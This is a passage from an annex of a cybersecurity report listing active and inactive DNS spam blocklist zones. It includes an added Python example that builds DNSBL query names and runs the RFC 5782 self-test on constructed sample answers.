148 McAfee RBL cidr.bl.mcafee.com ipv4 - -


149 MegaRBL.net rbl.megarbl.net ipv4 - -

150 Microsoft Forefront DNSBL dnsbl.forefront.microsoft.c ipv4 - - om

151 MIPSpace bl.mipspace.com ipv4 - -

152 MSRBL combined combined.rbl.msrbl.net ipv4 - -

153 MSRBL images images.rbl.msrbl.net ipv4 - -

154 MSRBL phishing phishing.rbl.msrbl.net ipv4 - -

155 MSRBL spam spam.rbl.msrbl.net ipv4 - -

156 MSRBL virus virus.rbl.msrbl.net ipv4 - -

157 MSRBL web web.rbl.msrbl.net ipv4 - -

158 MXRate RBL (hidden) ipv4 - -

159 nether.net (relays) relays.nether.net ipv4 - -

160 nether.net (trusted) trusted.nether.net ipv4 - -

161 nether.net (unsure) unsure.nether.net ipv4 - -

162 NiX Spam DNSBL ix.dnsbl.manitu.net ipv4 - -

163 no-more-funn no-more-funn.moensted.dk ipv4 - -

164 NoSolicitado.org (hidden) ipv4 - -

165 nsZones.com DNSWL wl.nszones.com ipv4 - -

166 nsZones.com Dyn dyn.nszones.com ipv4 - -

Copyright SAINT Consortium. All rights reserved. 116 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

167 nsZones.com SBL sbl.nszones.com ipv4 - -

168 nsZones.com SBL+Dyn bl.nszones.com ipv4 - -

169 nsZones.com SURBL ubl.nszones.com - - domain

170 Open Resolver Check dnsbl.openresolvers.org ipv4 - -

171 ops.asp.att.net blacklist mail blacklist.mail.ops.asp.att.ne ipv4 - - t

172 ops.asp.att.net blacklist sequoia blacklist.sequoia.ops.asp.at ipv4 - - t.net

173 Pedantic.org spam spam.pedantic.org ipv4 - -

174 pofon.foobar.hu IP Blacklist pofon.foobar.hu ipv4 ipv6 -

175 pofon.foobar.hu ISP mail relay ispmx.pofon.foobar.hu ipv4 ipv6 - whitelist

176 pofon.foobar.hu URI Blacklist uribl.pofon.foobar.hu - - domain

177 PowerWeb DNSBL (hidden) ipv4 - -

178 Project Honey Pot (http:BL) (hidden) ipv4 - -

179 Proofpoint Dynamic Reputation safe.dnsbl.prs.proofpoint.c ipv4 - - om

180 Protected Sky RBL bad.psky.me ipv4 - -

181 PSBL (Passive Spam Block List) psbl.surriel.com ipv4 - -

182 PSBL whitelist whitelist.surriel.com ipv4 - -

Copyright SAINT Consortium. All rights reserved. 117 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

183 RBL.JP all all.rbl.jp ipv4 - -

184 RBL.JP dyndns domainains dyndns.rbl.jp - - domain

185 RBL.JP short short.rbl.jp ipv4 - -

186 RBL.JP url url.rbl.jp - - domain

187 RBL.JP virus virus.rbl.jp ipv4 - -

188 rbl.rbldns.ru rbl.rbldns.ru ipv4 - -

189 rbl.schulte.org rbl.schulte.org ipv4 - -

190 rbl.talkactive.net rbl.talkactive.net ipv4 - -

191 rbl.zenon.net rbl.zenon.net ipv4 - -

192 realtimeBLACKLIST.COM rbl.realtimeblacklist.com ipv4 - -

193 Redhawk.org access.redhawk.org ipv4 - -

194 RedIRIS ListaBlanca ESWL eswlrev.dnsbl.rediris.es ipv4 ipv6 -

195 RedIRIS ListaBlanca MTAWL mtawlrev.dnsbl.rediris.es ipv4 ipv6 -

196 RFC-Clueless (RFC²) abuse RBL abuse.rfc-clueless.org - - domain

197 RFC-Clueless (RFC²) BogusMX bogusmx.rfc-clueless.org - - domain RBL

198 RFC-Clueless (RFC²) DSN RBL dsn.rfc-clueless.org - - domain

199 RFC-Clueless (RFC²) Elitist RBL elitist.rfc-clueless.org - - domain

200 RFC-Clueless (RFC²) Metalist fulldomain.rfc-clueless.org - - domain

Copyright SAINT Consortium. All rights reserved. 118 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

RBL

201 RFC-Clueless (RFC²) postmaster postmaster.rfc-clueless.org - - domain RBL

202 RFC-Clueless (RFC²) whois RBL whois.rfc-clueless.org - - domain

203 Rizon RBL/DNSBL dnsbl.rizon.net ipv4 - -

204 rjek.com mailsl DNSBL mailsl.dnsbl.rjek.com - - domain

205 rjek.com urlsl DNSBL urlsl.dnsbl.rjek.com - - domain

206 rothen.com DynIp dynip.rothen.com ipv4 - -

207 Route Views Project asn asn.routeviews.org ipv4 - -

208 Route Views Project aspath aspath.routeviews.org ipv4 - -

209 Rymsho's DNSBL dnsbl.rymsho.ru ipv4 - -

210 Rymsho's RHSBL rhsbl.rymsho.ru - - domain

211 s5h.net RBL all.s5h.net ipv4 ipv6 -

212 SARBL public.sarbl.org - - domain

213 scientificspam.net domainain rhsbl.scientificspam.net - - domain list

214 scientificspam.net IP list bl.scientificspam.net ipv4 - -

215 Scrollout F1 Reputation reputation- - - domain domainain domainain.rbl.scrolloutf1.c om

Copyright SAINT Consortium. All rights reserved. 119 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

216 Scrollout F1 Reputation IP reputation- ipv4 - - ip.rbl.scrolloutf1.com

217 Scrollout F1 Reputation NS reputation- - - domain ns.rbl.scrolloutf1.com

218 sectoor TOR blacklist tor.dnsbl.sectoor.de ipv4 - -

219 sectoor TOR blacklist (exit exitnodes.tor.dnsbl.sectoor ipv4 - - nodes) .de

220 SenderBase® query.senderbase.org ipv4 - -

221 SenderBase® (for sa.senderbase.org ipv4 - - SpamAssassin)

222 SenderBase® (Reputation List) rf.senderbase.org ipv4 - -

223 SenderScore Blacklist bl.score.senderscore.com ipv4 - -

224 SenderScore Reputationlist score.senderscore.com ipv4 - -

225 SINGULARis Spam/scam singular.ttk.pte.hu ipv4 - - blocklist

226 Solid Clues Blacklist blackholes.scconsult.com ipv4 - -

227 SORBS Aggregate zone dnsbl.sorbs.net ipv4 - -

228 SORBS Aggregate zone problems.dnsbl.sorbs.net ipv4 - - (problems)

229 SORBS Aggregate zone (proxies) proxies.dnsbl.sorbs.net ipv4 - -

230 SORBS Aggregate zone (relays) relays.dnsbl.sorbs.net ipv4 - -

Copyright SAINT Consortium. All rights reserved. 120 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

231 SORBS Aggregate zone (safe) safe.dnsbl.sorbs.net ipv4 - -

232 SORBS domainain names nomail.rhsbl.sorbs.net - - domain indicating no email sender

233 SORBS domainain names badconf.rhsbl.sorbs.net - - domain pointing to bad addresses

234 SORBS Dynamic IP Addresses dul.dnsbl.sorbs.net ipv4 - -

235 SORBS hijacked networks zombie.dnsbl.sorbs.net ipv4 - -

236 SORBS Hosts demanding never block.dnsbl.sorbs.net ipv4 - - be tested by SORBS

237 SORBS netblocks of spam escalations.dnsbl.sorbs.net ipv4 - - supporting service providers

238 SORBS Open HTTP Proxies http.dnsbl.sorbs.net ipv4 - -

239 SORBS Open other Proxies misc.dnsbl.sorbs.net ipv4 - -

240 SORBS Open SMTP relays smtp.dnsbl.sorbs.net ipv4 - -

241 SORBS Open SOCKS Proxies socks.dnsbl.sorbs.net ipv4 - -

242 SORBS RHS Aggregate zone rhsbl.sorbs.net - - domain

243 SORBS Spamhost (any time) spam.dnsbl.sorbs.net ipv4 - -

244 SORBS Spamhost (last 28 days) recent.spam.dnsbl.sorbs.ne ipv4 - - t

245 SORBS Spamhost (last 48 hours) new.spam.dnsbl.sorbs.net ipv4 - -

246 SORBS Spamhost (last year) old.spam.dnsbl.sorbs.net ipv4 - -

Copyright SAINT Consortium. All rights reserved. 121 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

247 SORBS Vulnerable formmailers web.dnsbl.sorbs.net ipv4 - -

248 South Korean Network Blocking korea.services.net ipv4 - - List

249 Spam Eating Monkey GeoBL geobl.spameatingmonkey.n ipv4 - - (deny all) et

250 Spam Eating Monkey SEM-ASN- origin.asn.spameatingmonk ipv4 - - ORIGIN ey.net

251 Spam Eating Monkey SEM- backscatter.spameatingmo ipv4 - - BACKSCATTER nkey.net

252 Spam Eating Monkey SEM- badnets.spameatingmonke ipv4 - - BADNETS y.net

253 Spam Eating Monkey SEM- bl.spameatingmonkey.net ipv4 - - BLACK

254 Spam Eating Monkey SEM- fresh.spameatingmonkey.n - - domain FRESH et

255 Spam Eating Monkey SEM- fresh10.spameatingmonkey - - domain FRESH10 .net

256 Spam Eating Monkey SEM- fresh15.spameatingmonkey - - domain FRESH15 .net

257 Spam Eating Monkey SEM- bl.ipv6.spameatingmonkey. - ipv6 - IPV6BL net

258 Spam Eating Monkey SEM- netbl.spameatingmonkey.n ipv4 - - NETBLACK et

259 Spam Eating Monkey SEM-URI uribl.spameatingmonkey.n - - domain et

Copyright SAINT Consortium. All rights reserved. 122 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

260 Spam Eating Monkey SEM- urired.spameatingmonkey. - - domain URIRED net

261 Spam Grouper Net block list netblockbl.spamgrouper.to ipv4 - -

262 Spam-RBL.fr all.spam-rbl.fr ipv4 - -

263 SpamCannibal bl.spamcannibal.org ipv4 - -

264 SpamCop Blocking List bl.spamcop.net ipv4 - -

265 Spamhaus DBL domainain Block dbl.spamhaus.org - - domain List

266 Spamhaus DWL domainain _vouch.dwl.spamhaus.org - - domain Whitelist

267 Spamhaus PBL Policy Block List pbl.spamhaus.org ipv4 - -

268 Spamhaus SBL Spamhaus Block sbl.spamhaus.org ipv4 - - List

269 Spamhaus SBL-XBL Combined sbl-xbl.spamhaus.org ipv4 - - Block List

270 Spamhaus SWL IP Whitelist swl.spamhaus.org ipv4 ipv6 -

271 Spamhaus XBL Exploits Block xbl.spamhaus.org ipv4 - - List

272 Spamhaus ZEN Combined Block zen.spamhaus.org ipv4 - - List

273 SpamLab FEB feb.spamlab.com ipv4 - -

274 SpamLab RBL rbl.spamlab.com ipv4 - -

Copyright SAINT Consortium. All rights reserved. 123 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

275 SpamRATS! all all.spamrats.com ipv4 - -

276 SpamRATS! Dyna dyna.spamrats.com ipv4 - -

277 SpamRATS! NoPtr noptr.spamrats.com ipv4 - -

278 SpamRATS! Spam spam.spamrats.com ipv4 - -

279 spamsources.fabel.dk spamsources.fabel.dk ipv4 - -

280 SpamStinks.com DNSBL bl.spamstinks.com ipv4 - -

281 SPFBL.net RBL dnsbl.spfbl.net ipv4 ipv6 domain

282 SPFBL.net Whitelist dnswl.spfbl.net ipv4 ipv6 domain

283 StopSpam.org dul dul.pacifier.net ipv4 - -

284 Suomispam Blacklist bl.suomispam.net ipv4 ipv6 -

285 Suomispam domainain Blacklist dbl.suomispam.net - - domain

286 Suomispam Graylist gl.suomispam.net ipv4 ipv6 -

287 SURBL multi (Combined SURBL multi.surbl.org ipv4 - domain list)

288 SurGATE Reputation Network srn.surgate.net ipv4 - - (SRN)

289 Swinog DNSRBL dnsrbl.swinog.ch ipv4 - -

290 Swinog URIBL uribl.swinog.ch - - domain

291 TDC's RBL rbl.tdk.net ipv4 - -

Copyright SAINT Consortium. All rights reserved. 124 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

292 TechnoVision SpamTrap st.technovision.dk ipv4 - -

293 The Day Old Bread List (aka dob.sibl.support- - - domain DOB) intelligence.net

294 Tiopan Consulting domainain dbl.tiopan.com - - domain Blacklist

295 Tiopan Consulting IP Blacklist bl.tiopan.com ipv4 - -

296 TornevallNET DNSBL dnsbl.tornevall.org ipv4 - -

297 Trend Micro DUL r.mail-abuse.com ipv4 - -

298 Trend Micro QIL q.mail-abuse.com ipv4 - -

299 TRIUMF.ca DNSBL rbl2.triumf.ca ipv4 - -

300 TRIUMF.ca DNSWL wbl.triumf.ca ipv4 - -

301 truncate.gbudb.net truncate.gbudb.net ipv4 - -

302 tuxad dunk.dnsbl dunk.dnsbl.tuxad.de ipv4 - -

303 tuxad hartkore.dnsbl hartkore.dnsbl.tuxad.de ipv4 - -

304 UCEPROTECT Level 0 dnsbl-0.uceprotect.net ipv4 - -

305 UCEPROTECT Level 1 dnsbl-1.uceprotect.net ipv4 - -

306 UCEPROTECT Level 2 dnsbl-2.uceprotect.net ipv4 - -

307 UCEPROTECT Level 3 dnsbl-3.uceprotect.net ipv4 - -

308 Unsubscribe Blacklist UBL ubl.unsubscore.com ipv4 - -

Copyright SAINT Consortium. All rights reserved. 125 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

309 URIBL black black.uribl.com - - domain

310 URIBL grey grey.uribl.com - - domain

311 URIBL multi multi.uribl.com - - domain

312 URIBL red red.uribl.com - - domain

313 URIBL white white.uribl.com - - domain

314 V4BL-FREE/DDNSBL-FREE free.v4bl.org ipv4 - -

315 V4BL/DDNSBL ip.v4bl.org ipv4 - -

316 WebIron LLC All RBL all.rbl.webiron.net ipv4 - -

317 WebIron LLC BABL RBL babl.rbl.webiron.net ipv4 - -

318 WebIron LLC CABL RBL cabl.rbl.webiron.net ipv4 - -

319 WebIron LLC Crawler RBL crawler.rbl.webiron.net ipv4 - -

320 WebIron LLC STABL RBL stabl.rbl.webiron.net ipv4 - -

321 Whitelisted.org ips.whitelisted.org ipv4 - -

322 Woody's SMTP Blacklist IPv4 blacklist.woody.ch ipv4 - -

323 Woody's SMTP Blacklist IPv6 ipv6.blacklist.woody.ch - ipv6 -

324 Woody's SMTP Blacklist URIBL uri.blacklist.woody.ch - - domain

325 WPBL - Weighted Private Block db.wpbl.info ipv4 - - List

326 www.blocklist.de bl.blocklist.de ipv4 - -

Copyright SAINT Consortium. All rights reserved. 126 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

327 ZapBL DNSRBL dnsbl.zapbl.net ipv4 - -

328 ZapBL RHSBL rhsbl.zapbl.net - - domain

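The ipv4 / ipv6 / domain columns in these lists state the kind of key each zone is queried with, and the difference matters in practice: an IPv4 key is queried with its octets reversed under the zone, an IPv6 key nibble-reversed, and a domain key as-is. The Python below is an added example, not code from the SAINT deliverable or from any list operator. It builds the query name for all three key types, interprets the 127.0.0.x answers as RFC 5782 describes them, and runs the RFC 5782 self-test (127.0.0.2 must be listed and 127.0.0.1 must not; TEST and INVALID for domain lists) through an injectable lookup so it runs offline. Zone names are taken from the lists above; SAMPLE_ANSWERS is constructed for the demonstration and is not captured DNS data. The self-test is the check to run before trusting any zone in these annexes: a retired list whose domain has lapsed can be re-registered and wildcarded, after which every query looks "listed" and a mail filter still configured with that zone rejects all inbound mail.

```python
"""DNSxL query construction and answer interpretation (RFC 5782).

Added example for this annex; not code from the SAINT deliverable.
Zone names come from the lists above; SAMPLE_ANSWERS is constructed for
the offline demonstration and is not a captured DNS response.
"""
import ipaddress
import socket

# RFC 5782 test entries per key type: (must be listed, must NOT be listed).
RFC5782_TEST_ENTRIES = {
    "ipv4": ("127.0.0.2", "127.0.0.1"),
    "ipv6": ("::ffff:7f00:2", "::ffff:7f00:1"),
    "domain": ("test", "invalid"),
}


def ipv4_query_name(ip: str, zone: str) -> str:
    """Reverse the octets and append the zone: 127.0.0.2 -> 2.0.0.127.<zone>."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone.strip(".")


def ipv6_query_name(ip: str, zone: str) -> str:
    """Nibble-reverse the full 128-bit address (as in ip6.arpa): 32 labels."""
    nibbles = ipaddress.IPv6Address(ip).exploded.replace(":", "")
    return ".".join(reversed(nibbles)) + "." + zone.strip(".")


def domain_query_name(name: str, zone: str) -> str:
    """RHSBL / URIBL lookup: the queried domain is prepended to the zone as-is."""
    label = name.strip().strip(".").lower()
    if not label or " " in label:
        raise ValueError(f"not a domain name: {name!r}")
    return label + "." + zone.strip(".")


def query_name(kind: str, value: str, zone: str) -> str:
    """Dispatch on the key type given in the ipv4 / ipv6 / domain columns."""
    builders = {"ipv4": ipv4_query_name, "ipv6": ipv6_query_name,
                "domain": domain_query_name}
    if kind not in builders:
        raise ValueError(f"unknown lookup type {kind!r}")
    return builders[kind](value, zone)


def classify_answer(answers) -> str:
    """Interpret the A records returned for a query name.

    []                     -> "not_listed" (NXDOMAIN)
    127.0.0.0/8            -> "listed"     (127.0.0.x codes, meaning is per list)
    127.255.255.0/24       -> "error"      (some operators, e.g. Spamhaus, signal
                                            rate limiting or open-resolver use here)
    anything outside 127/8 -> "bogus"      (zone is parked or wildcarded, so every
                                            client appears listed; never block on it)
    """
    if not answers:
        return "not_listed"
    addrs = [ipaddress.IPv4Address(a) for a in answers]
    if any(a not in ipaddress.ip_network("127.0.0.0/8") for a in addrs):
        return "bogus"
    if any(a in ipaddress.ip_network("127.255.255.0/24") for a in addrs):
        return "error"
    return "listed"


def resolve(name: str):
    """Live lookup with the system resolver; [] on NXDOMAIN or no answer."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except socket.gaierror:
        return []


def zone_passes_selftest(kind: str, zone: str, lookup=resolve) -> bool:
    """RFC 5782 self-test: the test entry is listed, the control entry is not."""
    must_list, must_not = RFC5782_TEST_ENTRIES[kind]
    positive = classify_answer(lookup(query_name(kind, must_list, zone)))
    negative = classify_answer(lookup(query_name(kind, must_not, zone)))
    return positive == "listed" and negative == "not_listed"


# Constructed sample answers standing in for a resolver (not captured traffic).
SAMPLE_ANSWERS = {
    "2.0.0.127.zen.spamhaus.org": ["127.0.0.2", "127.0.0.4", "127.0.0.10"],
    "1.0.0.127.zen.spamhaus.org": [],
    "test.dbl.spamhaus.org": ["127.0.1.2"],
    "invalid.dbl.spamhaus.org": [],
    # Assumed scenario: a lapsed Annex B zone re-registered and wildcarded.
    "2.0.0.127.dnsbl.ahbl.org": ["203.0.113.10"],
    "1.0.0.127.dnsbl.ahbl.org": ["203.0.113.10"],
}


def sample_lookup(name: str):
    return SAMPLE_ANSWERS.get(name, [])


if __name__ == "__main__":
    for kind, zone in (("ipv4", "zen.spamhaus.org"), ("domain", "dbl.spamhaus.org"),
                       ("ipv4", "dnsbl.ahbl.org")):
        print(kind, zone, "self-test:", zone_passes_selftest(kind, zone, sample_lookup))
    print(ipv6_query_name("::ffff:7f00:2", "bl.ipv6.spameatingmonkey.net"))
```

Run the module directly to see the self-test results for the constructed zones; pass resolve instead of sample_lookup to test a real zone, which generates DNS traffic and, against the larger operators, may hit query limits that come back as 127.255.255.x codes rather than listings.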

16 Annex B - List of all RBLs (Open Source Blacklists / Blocklists) – Currently Inactive – Feb 2019

List of all currently inactive RBLs (Blacklists / Blocklists)

Currently Inactive (488)

1 3y.spam.mrs.kithr 3y.spam.mrs.kithrup.com ipv4 - - up.com

2 510 Software blackholes.five-ten-sg.com ipv4 - - Group Blackholes

3 abuse.ch combined.abuse.ch ipv4 - - combined zone

4 abuse.ch dnsbl dnsbl.abuse.ch ipv4 - -

5 abuse.ch FastFlux drone.abuse.ch ipv4 - - Tracker

6 abuse.ch spam spam.abuse.ch ipv4 - - blacklist

7 abuse.ch Web httpbl.abuse.ch ipv4 - - abuse Tracker

8 AHBL ahbl.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

9 AHBL DNSbl dnsbl.ahbl.org ipv4 - -

10 AHBL exemptions exemptions.ahbl.org ipv4 - -

Copyright SAINT Consortium. All rights reserved. 128 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

11 AHBL IPAL ipal.ahbl.org ipv4 - -

12 AHBL IRCbl ircbl.ahbl.org ipv4 - -

13 AHBL RHSbl rhsbl.ahbl.org - - dom

14 AHBL TORbl tor.ahbl.org ipv4 - -

15 All Geek DNSBL dnsbl.allgeek.net ipv4 - -

16 all.spamblock.unit. all.spamblock.unit.liu.se ipv4 - - liu.se

17 ALPHANET blackholes.alphanet.ch ipv4 - - blackholes

18 AnonWhois.org list.anonwhois.net - - dom

19 ANTISPAM-UFRJ duinv.aupads.org ipv4 - - duinv

20 Antispam.or.id dnsbl.antispam.or.id ipv4 - -

21 Antispam.or.id orid.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

22 Antispam.or.id orrh.dnsbl.net.au - - dom RHS (@dnsbl.net.au)

23 APEWS Level 1 l1.apews.org - - dom

24 APEWS Level 1 l1.apews.rhsbl.sorbs.net - - dom (@SORBS)

25 APEWS Level 1 l1-apews.tqmcube.com - - dom (@TQMCube)

26 APEWS Level 1 l1.apews.rhsbl.uceprotect.net - - dom (@UCEPROTECT)

27 APEWS Level 2 l2.apews.org ipv4 - -

28 APEWS Level 2 l2.apews.dnsbl.sorbs.net ipv4 - - (@SORBS)

29 APEWS Level 2 l2-apews.tqmcube.com ipv4 - -

Copyright SAINT Consortium. All rights reserved. 129 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

(@TQMCube)

30 APEWS Level 2 l2.apews.dnsbl.uceprotect.net ipv4 - - (@UCEPROTECT)

31 arix.com fresh.dict.rbl.arix.com ipv4 - - Dictionary Spammers (fresh)

32 arix.com stale.dict.rbl.arix.com ipv4 - - Dictionary Spammers (stale)

33 arix.com Slippers fresh.sa_slip.rbl.arix.com ipv4 - - (fresh)

34 arix.com Slippers stale.sa_slip.arix.com ipv4 - - (stale)

35 ARSPAM arspam.buanzo.org ipv4 - - Argentinian Spammers DNSBL

36 ASPEWS Listings aspews.dnsbl.sorbs.net ipv4 - - (old zone)

37 ASPnet dnsbl.aspnet.hu ipv4 - dom DNSBL/URIBL

38 assholes.madscien assholes.madscience.nl ipv4 - - ce.nl

39 ATLBL ABL access.atlbl.net ipv4 - -

40 ATLBL HBL hbl.atlbl.net - - dom

41 ATLBL RBL rbl.atlbl.net ipv4 - -

42 BBM bbm.2ch.net ipv4 - -

43 BBQ niku.2ch.net ipv4 - -

44 BBX bbx.2ch.net ipv4 - -

45 be.whitelist.skopo be.whitelist.skopos.be ipv4 - - s.be

46 bl.borderworlds.dk bl.borderworlds.dk ipv4 - -

Copyright SAINT Consortium. All rights reserved. 130 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

47 bl.redhatgate.com bl.redhatgate.com ipv4 - -

48 bl.reynolds.net.au bl.reynolds.net.au ipv4 - -

49 bl.reynolds.net.au endn.bl.reynolds.net.au ipv4 - - (endn)

50 bl.reynolds.net.au pdl.bl.reynolds.net.au ipv4 - - (pdl)

51 bl.reynolds.net.au rdts.bl.reynolds.net.au ipv4 - - (rdts)

52 bl.reynolds.net.au wdl.bl.reynolds.net.au ipv4 - - (wdl)

53 bl.spam-trap.net bl.spam-trap.net ipv4 - -

54 BL.Spam.DeadBeef bl.deadbeef.com ipv4 - dom .Com

55 bl.spamthwart.co bl.spamthwart.com ipv4 - - m

56 bl.starloop.com bl.starloop.com ipv4 - -

57 bl.student.pw.edu. bl.student.pw.edu.pl ipv4 - - pl

58 bl.tolkien.dk bl.tolkien.dk ipv4 - -

59 blackholes.2mbit.c blackholes.2mbit.com ipv4 - - om

60 blackholes.brainer blackholes.brainerd.net ipv4 - - d.net

61 Blackholes.us countries.blackholes.us ipv4 - - countries

62 blacklist.fpsn.net blacklist.fpsn.net ipv4 - -

63 blacklist.informati blacklist.informationwave.net ipv4 - - onwave.net

64 BlarsBL block.blars.org ipv4 - -

Copyright SAINT Consortium. All rights reserved. 131 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

65 blbl.org IP RBL bl.blbl.org ipv4 - -

66 blbl.org URI RBL uri-bl.blbl.org - - dom

67 Blitzed Open Proxy opm.blitzed.org ipv4 - - Monitor (OPM)

68 Blitzed Open Proxy http.opm.blitzed.org ipv4 - - Monitor (OPM- http)

69 Blitzed Open Proxy socks.opm.blitzed.org ipv4 - - Monitor (OPM- socks)

70 Blitzed Open Proxy wingate.opm.blitzed.org ipv4 - - Monitor (OPM- wingate)

71 block.me.uk block.me.uk ipv4 - -

72 blocked.asgardnet. blocked.asgardnet.org ipv4 - - org

73 BlueShore bl.blueshore.net ipv4 - - Network Block List

74 Bulgarian SPAM dnsbl.isoc.bg ipv4 - - prevention system

75 Bulgarian SPAM dnswl.isoc.bg ipv4 - - prevention system whitelist

76 Burnt-Tech DNSBL dnsbl.burnt-tech.com ipv4 - -

77 C&CZ's own black blacklist.sci.ru.nl ipv4 - - list (old)

78 C&CZ's own white whitelist.sci.ru.nl ipv4 - - list (old)

79 Cart00ney.org cart00ney.surriel.com ipv4 - dom DNSBL/RHSBL

80 catchspam.com catchspam.com ipv4 - -

Copyright SAINT Consortium. All rights reserved. 132 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

81 cbn.net.id DNSBL dnsbl.cbn.net.id ipv4 - -

82 cbn.net.id RBL rbl.cbn.net.id ipv4 - -

83 chickenboner.biz fl.chickenboner.biz ipv4 - -

84 cluecentral.net satos.rbl.cluecentral.net ipv4 - - Satos

85 completewhois arin-legacy- ipv4 - - Bogons "legacy" classb.bogons.dnsiplists.completewhois ARIN Class-B blocks .com

86 completewhois arin-legacy- ipv4 - - Bogons "legacy" classc.bogons.dnsiplists.completewhois ARIN Class-C blocks .com

87 completewhois apnic- ipv4 - - Bogons APNIC main.bogons.dnsiplists.completewhois. main ip blocks com

88 completewhois iana- ipv4 - - Bogons IANA classa.bogons.dnsiplists.completewhois unallocated Class- .com A blocks

89 completewhois lacnic- ipv4 - - Bogons LACNIC ip main.bogons.dnsiplists.completewhois. blocks com

90 completewhois arin- ipv4 - - Bogons newer main.bogons.dnsiplists.completewhois. (used after 1995) com ARIN blocks

91 completewhois ripe- ipv4 - - Bogons RIPE NCC main.bogons.dnsiplists.completewhois. main ip blocks com

92 completewhois combined- ipv4 - - combined HIB HIB.dnsiplists.completewhois.com

93 completewhois country- ipv4 - - Country Rirdata rirdata.dnsiplists.completewhois.com

94 completewhois bogons.dnsiplists.completewhois.com ipv4 - - entire Bogons

Copyright SAINT Consortium. All rights reserved. 133 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

dataset

95 completewhois hijacked.dnsiplists.completewhois.com ipv4 - - Hijacked IP blocks

96 completewhois invalidipwhois.dnsiplists.completewhoi ipv4 - - Invalid IP Whois s.com blocks

97 compu.net blackhole.compu.net ipv4 - - blackhole

98 compu.net pacbelldsl.compu.net ipv4 - - pacbelldsl

99 compu.net pm0- pm0-no-more.compu.net ipv4 - - no-more

100 D. D. N. S. B. L. (old ddnsbl.internetdefensesystems.com ipv4 - - domain)

101 dev.null.dk dev.null.dk ipv4 - -

102 dews.qmail.org dews.qmail.org ipv4 - -

103 dnsbl.clue-by- dnsbl.clue-by-4.org ipv4 - - 4.org

104 dnsbl.cmbix.com dnsbl.cmbix.com ipv4 - -

105 dnsbl.delink.net dnsbl.delink.net ipv4 - -

106 dnsbl.ioerror.us dnsbl.ioerror.us ipv4 - -

107 dnsbl.ipocalypse.n dnsbl.ipocalypse.net ipv4 - - et

108 dnsbl.mags.net dnsbl.mags.net ipv4 - -

109 dnsbl.net.au (ahrh) ahrh.dnsbl.net.au ipv4 - dom

110 dnsbl.net.au (endl) endl.dnsbl.net.au ipv4 - -

111 dnsbl.net.au endn.dnsbl.net.au - - dom (endn)

112 dnsbl.net.au enpb.dnsbl.net.au ipv4 - - (enpb)

Copyright SAINT Consortium. All rights reserved. 134 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

113 dnsbl.net.au (jwrh) jwrh.dnsbl.net.au - - dom

114 dnsbl.net.au ohps.dnsbl.net.au ipv4 - - (ohps)

115 dnsbl.net.au omrs.dnsbl.net.au ipv4 - - (omrs)

116 dnsbl.net.au (osps) osps.dnsbl.net.au ipv4 - -

117 dnsbl.net.au (osrs) osrs.dnsbl.net.au ipv4 - -

118 dnsbl.net.au (owfs) owfs.dnsbl.net.au ipv4 - -

119 dnsbl.net.au owps.dnsbl.net.au ipv4 - - (owps)

120 dnsbl.net.au probes.dnsbl.net.au ipv4 - - (probes)

121 dnsbl.net.au (rddn) rddn.dnsbl.net.au - - dom

122 dnsbl.net.au (rdts) rdts.dnsbl.net.au ipv4 - -

123 dnsbl.net.au (ricn) ricn.dnsbl.net.au ipv4 - -

124 dnsbl.net.au (rmst) rmst.dnsbl.net.au ipv4 - -

125 dnsbl.net.au (t1) t1.dnsbl.net.au ipv4 - -

126 dnsbl.net.au (t2) t2.dnsbl.net.au ipv4 - -

127 dnsbl.net.au (t3) t3.dnsbl.net.au ipv4 - -

128 dnsbl.net.au t3direct.dnsbl.net.au ipv4 - - (t3direct)

129 dnsbl.pagedirect.n dnsbl.pagedirect.net ipv4 - - et

130 dnsbl.regedit64.ne dnsbl.regedit64.net ipv4 - - t

131 dnsbl.technoirc.or dnsbl.technoirc.org ipv4 - - g

132 DNSRBL.net dun dun.dnsrbl.net ipv4 - -

Copyright SAINT Consortium. All rights reserved. 135 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

133 DNSRBL.net spam spam.dnsrbl.net ipv4 - -

134 dorkslayers orbs orbs.dorkslayers.com ipv4 - -

135 dorkslayers relays relays.dorkslayers.com ipv4 - -

136 dorkslayers ztl ztl.dorkslayers.com ipv4 - -

137 DRBL be.net.ru devnull.drbl.be.net.ru ipv4 - - (devnull node)

138 DRBL be.net.ru proxy.drbl.be.net.ru ipv4 - - (proxy node)

139 DRBL be.net.ru vote.drbl.be.net.ru ipv4 - - (vote node)

140 DRBL croco.net vote.drbl.croco.net ipv4 - - (vote node)

141 DRBL croco.net work.drbl.croco.net ipv4 - - (work node)

142 DRBL vote.drbl.dataforce.net ipv4 - - dataforce.net (vote node)

143 DRBL work.drbl.dataforce.net ipv4 - - dataforce.net (work node)

144 DRBL drand.net spamflood.drbl.drand.net ipv4 - - (spamflood vote node)

145 DRBL drand.net spamprobe.drbl.drand.net ipv4 - - (spamprobe vote node)

146 DRBL drand.net spamtrap.drbl.drand.net ipv4 - - (spamtrap vote node)

147 DRBL drand.net vote.drbl.drand.net ipv4 - - (vote node)

148 DRBL drand.net work.drbl.drand.net ipv4 - -

